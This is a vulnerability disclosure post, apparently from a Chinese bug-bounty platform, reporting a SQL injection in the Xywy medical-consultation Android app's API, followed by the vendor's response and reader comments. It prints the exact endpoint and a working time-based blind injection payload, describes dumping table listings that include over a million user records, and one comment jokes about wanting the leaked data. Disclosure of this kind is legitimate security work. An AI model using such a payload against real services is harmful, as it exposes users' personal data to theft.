寻医问药官方APP存在SQL注入（含116W+用户数据）

目标：寻医问药问医生Android APP

检测发现以下地方存在SQL注入：

http://api.m.xywy.com/api/?m=Askintegral&act=apply&appname=ask&edition=4.3&model=1&sign=3f36f776d163c6b6c74b1adfdc1b41db

Payload：

appname=ask') AND (SELECT * FROM (SELECT(BENCHMARK(2000000,MD5(0x666c5a50))))flZP) AND ('FMij'='FMij

1、跑出当前数据库用户

2、跑出所有数据库

3、跑出当前库所有表，发现116W+用户数据，具体就不深入了~

请多指教~

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2016-03-13 17:44

厂商回复：

我们在9月21号就发现了这个SQL注入漏洞，同一个注入点，并且提交了详细的安全报告，当时漏洞修复了，不知什么原因又重现了。

最新状态：

2016-03-14：已经修复，即便是在数据库拿到我们的用户密码也是破不出的，不过奇怪的是研发并没有找到user_info*这个表。

2016-03-14：已经修复，不过奇怪的是研发并没有找到user_info*这个表，我们的这个库中也并不存储用户密码，而且在别的库中拿到密码也是破不出的。至于为什么注入点修复后又重现了，是因为运行了一段时间，研发发现app的日志无法正常写入数据库，经查看发现是因为加了全局安全函数影响的，为了不影响日志的写入，研发就暂时撤掉了全局安全函数另想他法。

1. 2016-03-13 16:07 | 小豹 ( 实习白帽子 | Rank:57 漏洞数:10 | 没有不老的誓言，没有不变的承诺，踏上旅途...)

   1

   可以的，兄弟

   1# 回复此人

2. 2016-03-13 16:33 | js2012 ( 普通白帽子 | Rank:126 漏洞数:44 | 闭关修炼。。。)

   1

   MARK

   2# 回复此人

3. 2016-03-14 17:35 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | ☯☯☯☯☯☯☯☯☯☯)

   5

   以前我加的全局过滤函数就这么废弃，哎=。=

   3# 回复此人

4. 2016-03-15 11:21 | Mark0smith ( 普通白帽子 | Rank:176 漏洞数:71 )

   1

   回复赞

   4# 回复此人

5. 2016-03-15 12:41 | hblf ( 路人 | Rank:16 漏洞数:3 | 甲方安全攻城狮一枚)

   1

   另作他法，是什么法。

   5# 回复此人

6. 2016-03-22 11:55 | 平底斜 ( 普通白帽子 | Rank:126 漏洞数:30 | 性骄奢，好声色，为文有汉魏风)

   1

   我只要裤子来丰富我的电脑

   6# 回复此人